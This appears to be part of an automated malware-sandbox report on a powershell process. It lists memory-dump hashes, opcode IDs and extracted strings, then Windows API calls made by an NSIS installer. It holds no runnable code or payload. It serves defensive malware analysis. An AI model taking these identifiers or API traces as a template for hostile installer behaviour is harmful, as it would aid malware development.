                                                          • Instruction Fuzzy Hash: 41E1B3B1B102059FCB14EBA8C541B9EBBB3AFC4304F24D569E5056F795CB72EC828B91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fzl$4'sq$4'sq$x.kk$-kk
                                                          • API String ID: 0-2833815769
                                                          • Opcode ID: 0007f19047eee3ba47203d3ff7056f088da8d2c4119f126356efa97c8817b090
                                                          • Instruction ID: fd12c1c713b34a93cbb53cb3fa91be2374e0b7815b88f7f176ee90c4f9265a36
                                                          • Opcode Fuzzy Hash: 0007f19047eee3ba47203d3ff7056f088da8d2c4119f126356efa97c8817b090
                                                          • Instruction Fuzzy Hash: 76C193B1A002059FCB14EF98C541BDEFBB2AF85304F25D55AE5056F396CB72E882CB91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fzl$4'sq$x.kk$-kk
                                                          • API String ID: 0-2898014252
                                                          • Opcode ID: 6dc702d1a2c415ba9be8d5233cc1b84024861322a496a8f81b14819781a18135
                                                          • Instruction ID: d7f6de1b618f60f732939c60d9814963498e79de523a6fa176ad3f1b082cbc22
                                                          • Opcode Fuzzy Hash: 6dc702d1a2c415ba9be8d5233cc1b84024861322a496a8f81b14819781a18135
                                                          • Instruction Fuzzy Hash: 5BA25FB4A00205DFDB14DF58C541B9ABBB2BF85314F24C599E909AF792CB72EC42CB91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fzl$4'sq$4wl$x.kk
                                                          • API String ID: 0-17863173
                                                          • Opcode ID: c1f603231ce36e59b0a65bfcae0a029749f56fdfd715321621ba1e957cd076b3
                                                          • Instruction ID: b32d5a1d9d5a167ddedece67627cd10d0f4c1592db4c0bfa49fc2adc48d9ec9b
                                                          • Opcode Fuzzy Hash: c1f603231ce36e59b0a65bfcae0a029749f56fdfd715321621ba1e957cd076b3
                                                          • Instruction Fuzzy Hash: 54125CB4A00215DFD764DB58C954BEAB7B2BF85304F1080A5E909AF791CB72ED86CF81
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fzl$4'sq$4wl$x.kk
                                                          • API String ID: 0-17863173
                                                          • Opcode ID: b66bed78e2c71aa82fe2958ba554831d98e3a38886570de764b9af434965e1be
                                                          • Instruction ID: 99a61efe4b8d2c4ed59ad9050fb266c99d32638524da70b085682336bca7be5e
                                                          • Opcode Fuzzy Hash: b66bed78e2c71aa82fe2958ba554831d98e3a38886570de764b9af434965e1be
                                                          • Instruction Fuzzy Hash: C9E15CB4A00215DFD760DB58C955BEAB7B2BF85304F1180E5E909AF791CB32AD86CF81
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fzl$4'sq$4wl$x.kk
                                                          • API String ID: 0-17863173
                                                          • Opcode ID: 2d533d775518b56e1981ac3eee2997bcb91855c5a8c4276df5c186e9bde3e8c5
                                                          • Instruction ID: 45b36156754910ce2a1c82234c3d36dcdaf306195f57d97b3db3b945121716a0
                                                          • Opcode Fuzzy Hash: 2d533d775518b56e1981ac3eee2997bcb91855c5a8c4276df5c186e9bde3e8c5
                                                          • Instruction Fuzzy Hash: 2CE15DB0A00215DFD760DB58C955BEAB7B2BF85304F1080E5E909AF791CB72AD86CF81
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'sq$x.kk$-kk
                                                          • API String ID: 0-3143426489
                                                          • Opcode ID: 7141ea1a1fc84d347cf92be56e1181ba7b21034307d66bed7c4fd48b6a861847
                                                          • Instruction ID: 25e079899d8361242c84a417865b5780b52e026347a143c0523cd4575850492f
                                                          • Opcode Fuzzy Hash: 7141ea1a1fc84d347cf92be56e1181ba7b21034307d66bed7c4fd48b6a861847
                                                          • Instruction Fuzzy Hash: BC3251B4A002059FDB14DF58C941B9ABBB2AF84314F25C599E909AF791CB72EC42CF91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'sq$x.kk$-kk
                                                          • API String ID: 0-3143426489
                                                          • Opcode ID: c4b440ef865aaa1fd37495718cc511851f5b5a93b1ad48ff883c3f347d133ba5
                                                          • Instruction ID: 542c14c230188b748ab6b12941e09151397dc218fbd47fc9be19bfbdf4318d13
                                                          • Opcode Fuzzy Hash: c4b440ef865aaa1fd37495718cc511851f5b5a93b1ad48ff883c3f347d133ba5
                                                          • Instruction Fuzzy Hash: 85328FB0B002149FD750DB58C951FAABBB3AF85314F1084A5E909AF791CB72ED828F91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2746467074.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4460000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Hwq$$sq$$sq
                                                          • API String ID: 0-2950745084
                                                          • Opcode ID: d87837133c30384fd281a21b43a6aae6180079a1baf59a78355fda81fadd94f9
                                                          • Instruction ID: c006377f69736d038e4b622d6250626a753583c400982b7f904ebe4bda96b888
                                                          • Opcode Fuzzy Hash: d87837133c30384fd281a21b43a6aae6180079a1baf59a78355fda81fadd94f9
                                                          • Instruction Fuzzy Hash: 1E225F34B001549FDB29DB64D8947AEB7B2EF89304F1444AAD40AAB361DF35ED85CF81
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'sq$x.kk$-kk
                                                          • API String ID: 0-3143426489
                                                          • Opcode ID: e2a3ef63771e9aebed2c6154773327a7ea7116aeec0bbe24418c1e2481526330
                                                          • Instruction ID: 4c13865658d5c8021749b895e1ed7927514a0ebab9a31902f415a09d6b3e4e10
                                                          • Opcode Fuzzy Hash: e2a3ef63771e9aebed2c6154773327a7ea7116aeec0bbe24418c1e2481526330
                                                          • Instruction Fuzzy Hash: 480243B4B002059FDB14DF58C941B9ABBB2EF84314F148599E909AF791CB71ED81CF91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'sq$x.kk$-kk
                                                          • API String ID: 0-3143426489
                                                          • Opcode ID: 9271f5ea362310067f93d6c6d9c0ceec214fb610f7e84ec5531abb5e087a2ae4
                                                          • Instruction ID: f12dcf6aa0c24c79c3fccfff3382b22c58e8c3b87a2db6a7714c9bd757351943
                                                          • Opcode Fuzzy Hash: 9271f5ea362310067f93d6c6d9c0ceec214fb610f7e84ec5531abb5e087a2ae4
                                                          • Instruction Fuzzy Hash: CA027EB0B002149FD754DB58C951FAABBB2EF85314F108499E909AF791CB72ED82CF91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fzl$(fzl
                                                          • API String ID: 0-1925437669
                                                          • Opcode ID: 6b1c7d42631aa0ef27bac0fcc6b92883ed4a18717466e30d04e316b043bcce20
                                                          • Instruction ID: e2f85f55570684b9348f6aca8f5f7d4690f02f4b934da912169ef84bbcba1744
                                                          • Opcode Fuzzy Hash: 6b1c7d42631aa0ef27bac0fcc6b92883ed4a18717466e30d04e316b043bcce20
                                                          • Instruction Fuzzy Hash: 011261B4B012099FCB54DB98C541AAABBF3AF85304F14C1AAD915AF751DB32EC42CB91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: afb7fa04bf7628d16b07e804efdd9c2aef461e7cd5379b826d7d7ebd4e48595a
                                                          • Instruction ID: 20c9ec9df603dd7f833cb23193b2fa8fb2b2d38038c839dbdd8befa498b7530f
                                                          • Opcode Fuzzy Hash: afb7fa04bf7628d16b07e804efdd9c2aef461e7cd5379b826d7d7ebd4e48595a
                                                          • Instruction Fuzzy Hash: 5D01477631021ACBC72066AAE4001BBB799DFC6222F14C4BFDA45DBB41DA72C846D360
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2746467074.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4460000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ea7593f21fe8a70922feda10464d4963121ee170d0d58460169bf0f9e461f6b7
                                                          • Instruction ID: b4c5178228d93c75f50786230cb7cbdcc9082dc385f33ba1ba5f0195f19afa2e
                                                          • Opcode Fuzzy Hash: ea7593f21fe8a70922feda10464d4963121ee170d0d58460169bf0f9e461f6b7
                                                          • Instruction Fuzzy Hash: 0B110734A00259AFCF05CFA8D884A9DFBB2FF48314F288549E405AB365C771A882CF50
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2746312811.0000000002C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C4D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2c4d000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 81a4de962ed26a113edf093ab73f0a40bf5f264ace1a483f08651352ede8e65d
                                                          • Instruction ID: f042b8846353aa0c95e6edcb26033b6a02f30d38da4c44c8a419a1d6f62e246f
                                                          • Opcode Fuzzy Hash: 81a4de962ed26a113edf093ab73f0a40bf5f264ace1a483f08651352ede8e65d
                                                          • Instruction Fuzzy Hash: 96015E6240E3C05FD7128B258994B52BFB8DF53224F1DC1DBE9888F1A3C6695849C7B2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2746312811.0000000002C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C4D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2c4d000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c9dcdde4b9c2eacdd3acc26eec9a23060eb47582286000891f45a3aa62a1fb14
                                                          • Instruction ID: 8cddc454877957187f75306ddc556542674e7b4cd624594aa5ab24445b9014c5
                                                          • Opcode Fuzzy Hash: c9dcdde4b9c2eacdd3acc26eec9a23060eb47582286000891f45a3aa62a1fb14
                                                          • Instruction Fuzzy Hash: C901DB714053409AE7106E26CDC4B67BF98DF81374F18C51AFD4A4B142CF79A941C6F1
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 913fedfdabb12ffbe92392451ce87d7584920e3e7a5771f6a0489f3bbbfe9505
                                                          • Instruction ID: 021c9a0449226f80f71251a6bc331b2fc4d6bde8f124ea6cdb26bcf0f4bb704f
                                                          • Opcode Fuzzy Hash: 913fedfdabb12ffbe92392451ce87d7584920e3e7a5771f6a0489f3bbbfe9505
                                                          • Instruction Fuzzy Hash: DBB092242051404FC2018A20CA51414BB20AA82204328C0EA98048B252CA22A907E700
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2746312811.0000000002C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C4D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2c4d000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e88dbbeb88ac0bb6013723ae8f59ce995a92331b79c5644e5b7478e365ac3978
                                                          • Instruction ID: 315ddc3149f01ffc1981a2481d0f51d2b9a5af92917269c9ab316521d230fe3b
                                                          • Opcode Fuzzy Hash: e88dbbeb88ac0bb6013723ae8f59ce995a92331b79c5644e5b7478e365ac3978
                                                          • Instruction Fuzzy Hash: 7B21D3B6504200DFDB15EF14D9C0F27BF65FB84324F24C569E90A4B25AC736D456CAA1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'sq$84xl$84xl$tPsq$tPsq$$sq$(yq$(yq$(yq
                                                          • API String ID: 0-2463238278
                                                          • Opcode ID: a2ab2976a62f2524444819d12314639511aecc27365804588d4c0fad91502380
                                                          • Instruction ID: f1f83cdcd22215630f65b36dc855be30c960ccfa0f12a3b94dde1f246513a282
                                                          • Opcode Fuzzy Hash: a2ab2976a62f2524444819d12314639511aecc27365804588d4c0fad91502380
                                                          • Instruction Fuzzy Hash: E271C2B07022459FCB24EE58C940BFAB7B2AF85310F19C45BE905AB391D731DC85CB91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 84xl$84xl$84xl$84xl$tPsq$tPsq$tPsq$tPsq
                                                          • API String ID: 0-274998026
                                                          • Opcode ID: c3cb580c7bfd4c4376a6efb0ebc5808f4bde355469c260e001c18e39f7c136f1
                                                          • Instruction ID: f23dcbd316c9c4199f65e9c449b0211c5ef588eaec012adb7db1ae0aa8be5234
                                                          • Opcode Fuzzy Hash: c3cb580c7bfd4c4376a6efb0ebc5808f4bde355469c260e001c18e39f7c136f1
                                                          • Instruction Fuzzy Hash: B8D1F9F1B042459FC724AB6CC955AABBBA2AFC5314F14C46BE9059F381DB31DC42CBA1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'sq$84xl$TQxq$TQxq$tPsq$$sq$$sq$$sq
                                                          • API String ID: 0-3390573635
                                                          • Opcode ID: e53ba49a4657fe698c33e1a1e60154b970bc889c801a7fc8e61c6e88bfb8955f
                                                          • Instruction ID: 8d1f2def70e0e46fb304a3076a208e50045d55d8ccd73cd499d188fb82261367
                                                          • Opcode Fuzzy Hash: e53ba49a4657fe698c33e1a1e60154b970bc889c801a7fc8e61c6e88bfb8955f
                                                          • Instruction Fuzzy Hash: 2051DCF0706206DFDB25EE14C6447E6B7B2BB41321F18C86BE8158B691C735DD82CBA1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'sq$84xl$tPsq$$sq$$sq$$sq
                                                          • API String ID: 0-836809895
                                                          • Opcode ID: e1329241e1e3a2a37bcb1e1eb1e44832422ee3c8593dbe6df98dbe8d9f18e22f
                                                          • Instruction ID: 1c39d18df5b054b3c9fa7b5535b993a558b092e084d8cf9ca6abf0bff270a27d
                                                          • Opcode Fuzzy Hash: e1329241e1e3a2a37bcb1e1eb1e44832422ee3c8593dbe6df98dbe8d9f18e22f
                                                          • Instruction Fuzzy Hash: 7C61FFF0A0020ADBDB24AE14C944BEBB7A2FF45351F1A84A7E8145B391C731DD95CBA1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $sq$$sq$$sq$$sq$$sq$$sq
                                                          • API String ID: 0-3087168343
                                                          • Opcode ID: a3b5cb2e9ccafc6785a9436c416b6006ce4f51a8effad537ffcd1c7fcd3674ca
                                                          • Instruction ID: 756c3eee1d44919c37e2ab02d592e27732bdddcba4529edf53194a58c9426294
                                                          • Opcode Fuzzy Hash: a3b5cb2e9ccafc6785a9436c416b6006ce4f51a8effad537ffcd1c7fcd3674ca
                                                          • Instruction Fuzzy Hash: 59315AB6B882478BCB372AB9A8501F7FFA2ABC1211B24447BC54287342DE35C846D352
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'sq$4'sq$$sq$$sq$$sq
                                                          • API String ID: 0-737313894
                                                          • Opcode ID: dc8eacba23bd53595dbc721d3c7d8b968f4ce9afdeaaf2ec71198fdd08e9c704
                                                          • Instruction ID: 4a4af0ce8be77529728c42358c092e05c9867d8ec965d9e6b5937edffa7eb36b
                                                          • Opcode Fuzzy Hash: dc8eacba23bd53595dbc721d3c7d8b968f4ce9afdeaaf2ec71198fdd08e9c704
                                                          • Instruction Fuzzy Hash: 394126B1B042069FCB15AA7895206FB7BA29FC2210F5544BBD505CB3A1DF36C982C7A1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 84xl$XRxq$XRxq$tPsq$$sq
                                                          • API String ID: 0-1049711044
                                                          • Opcode ID: f10bb429a71272fb83607a786e6756499d8631195829ae961cb3048219f26df3
                                                          • Instruction ID: 1517a3b72949e0d909b45db29a09e2c0d060005bb25e40464b0ef30a876ca19b
                                                          • Opcode Fuzzy Hash: f10bb429a71272fb83607a786e6756499d8631195829ae961cb3048219f26df3
                                                          • Instruction Fuzzy Hash: 15416DF0A04205DBCB24EF59C154AEAF7F2EB89324F5AC4AAE415AB351C731DD41CB91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $sq$$sq$$sq$pl$pl
                                                          • API String ID: 0-108492800
                                                          • Opcode ID: c6b9cb603b631336ba7eef6c6fda7318cbe8170422ad776173b85fcd609e911c
                                                          • Instruction ID: ea4a336122e5eea788765e14726ccc539bf138f667c08b4c34002d4b4e769a57
                                                          • Opcode Fuzzy Hash: c6b9cb603b631336ba7eef6c6fda7318cbe8170422ad776173b85fcd609e911c
                                                          • Instruction Fuzzy Hash: 241129B1715206ABDB24756A98007A7F7A6BBC2324F24842BE44987391CB31C84BC350
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (osq$(osq$(osq$(osq
                                                          • API String ID: 0-1093687733
                                                          • Opcode ID: 4f48619aa1a2819efba31c2988b8dea14ab5b8d36cff81e63eca4c1554603d9c
                                                          • Instruction ID: 62e4d82fca442f2c198ee015ec7bceab550ca764f6012a98fe9aad5e21177ca0
                                                          • Opcode Fuzzy Hash: 4f48619aa1a2819efba31c2988b8dea14ab5b8d36cff81e63eca4c1554603d9c
                                                          • Instruction Fuzzy Hash: 19F119B1708386DFCB15AF68C8647EBBBA2AF81311F14C46BE5558B391DB32E841CB51
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'sq$4'sq$4'sq$4'sq
                                                          • API String ID: 0-1617174353
                                                          • Opcode ID: 775530e04f1777aa7226552a90bf95210438b4231e06f5df2e9590f66b316261
                                                          • Instruction ID: 10a409e30a3c266838835b86698ec098a99522ee129be82450e0ada28873f82b
                                                          • Opcode Fuzzy Hash: 775530e04f1777aa7226552a90bf95210438b4231e06f5df2e9590f66b316261
                                                          • Instruction Fuzzy Hash: 0AE14DF6B082569FCB25AB7889017A7BBA29FC2315F18847BD905CB351DF32D842C791
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'sq$4'sq$x.kk$-kk
                                                          • API String ID: 0-2206710387
                                                          • Opcode ID: d522653b70156c5ee613da01400ea3e1a982f77bbcdce2a218c6166fe103fd88
                                                          • Instruction ID: 05845b356dab307b5103a4cf848a9d1376c179a9fa3acef212710e42d18bf487
                                                          • Opcode Fuzzy Hash: d522653b70156c5ee613da01400ea3e1a982f77bbcdce2a218c6166fe103fd88
                                                          • Instruction Fuzzy Hash: 62F15CB0A00219DFCB54DB58C945BDABBB2BF88304F1085D5E9096F785CB72AD86CF91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 84xl$84xl$tPsq$tPsq
                                                          • API String ID: 0-2601135372
                                                          • Opcode ID: abc06201ad0597d2704de5f224a233218f3d229e70150507807d848ddce6eaf9
                                                          • Instruction ID: e67b88dbf78abd5e1e7ac4e283a4008260a72f405517972f1c81df50a7e4ad2b
                                                          • Opcode Fuzzy Hash: abc06201ad0597d2704de5f224a233218f3d229e70150507807d848ddce6eaf9
                                                          • Instruction Fuzzy Hash: 3C9138B17042469BCB28AE79C8516ABBFE6AFC5310F18846BD945DB392CF31D841C7A1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fzl$(fzl$(fzl$(fzl
                                                          • API String ID: 0-3225199445
                                                          • Opcode ID: d55cdde3d753385e7d87383f6fd39045f648e7fea4da9aa06c4c3f0fcff83005
                                                          • Instruction ID: 32e42e6dc5f27bacf3fe83d5bcfb88798ff1e210724f66ec020a9e52f8213d8e
                                                          • Opcode Fuzzy Hash: d55cdde3d753385e7d87383f6fd39045f648e7fea4da9aa06c4c3f0fcff83005
                                                          • Instruction Fuzzy Hash: 57719DF0E00245DBCB14DFACC541AAABBB2AF89314F15C16AD804AF751DB32DC82CB91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $sq$$sq$$sq$$sq
                                                          • API String ID: 0-2855845837
                                                          • Opcode ID: cfb6b4e2735ec27bf619fe59c374bfe8834041794311e38a2a5c9e0aedaa49c0
                                                          • Instruction ID: 65a9b0612b1deab932c16e1eabad800af8859925adfe05c848b310b3a6a457e3
                                                          • Opcode Fuzzy Hash: cfb6b4e2735ec27bf619fe59c374bfe8834041794311e38a2a5c9e0aedaa49c0
                                                          • Instruction Fuzzy Hash: E52149F27152425BDB34657E69007B3B69AABC0710F24883BAD09CB382EF35D84BD361
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'sq$4'sq$$sq$$sq
                                                          • API String ID: 0-148891389
                                                          • Opcode ID: a9f6502fcff3fbddde7b2dfd6734b8c167f0661dd9a5a72c185d0164a07b6436
                                                          • Instruction ID: cc9c014aece1b486a41d1178555bd8ac5ab402af2b88301515d10408b61d0c51
                                                          • Opcode Fuzzy Hash: a9f6502fcff3fbddde7b2dfd6734b8c167f0661dd9a5a72c185d0164a07b6436
                                                          • Instruction Fuzzy Hash: 7E0126B270C38A4FC72B23A858201567B726FC2600B6A41E3C181CF3A3CE258C878797
                                                          APIs
                                                          • SetErrorMode.KERNEL32 ref: 00403134
                                                          • GetVersion.KERNEL32 ref: 0040313A
                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403163
                                                          • #17.COMCTL32(00000007,00000009), ref: 00403185
                                                          • OleInitialize.OLE32(00000000), ref: 0040318C
                                                          • SHGetFileInfoA.SHELL32(00428828,00000000,?,00000160,00000000), ref: 004031A8
                                                          • GetCommandLineA.KERNEL32(0042DC00,NSIS Error), ref: 004031BD
                                                          • GetModuleHandleA.KERNEL32(00000000,00434000,00000000), ref: 004031D0
                                                          • CharNextA.USER32(00000000,00434000,00000020), ref: 004031FB
                                                          • GetTempPathA.KERNEL32(00000400,00435400,00000000,00000020), ref: 004032F8
                                                          • GetWindowsDirectoryA.KERNEL32(00435400,000003FB), ref: 00403309
                                                          • lstrcatA.KERNEL32(00435400,\Temp), ref: 00403315
                                                          • GetTempPathA.KERNEL32(000003FC,00435400,00435400,\Temp), ref: 00403329
                                                          • lstrcatA.KERNEL32(00435400,Low), ref: 00403331
                                                          • SetEnvironmentVariableA.KERNEL32(TEMP,00435400,00435400,Low), ref: 00403342
                                                          • SetEnvironmentVariableA.KERNEL32(TMP,00435400), ref: 0040334A
                                                          • DeleteFileA.KERNEL32(00435000), ref: 0040335E
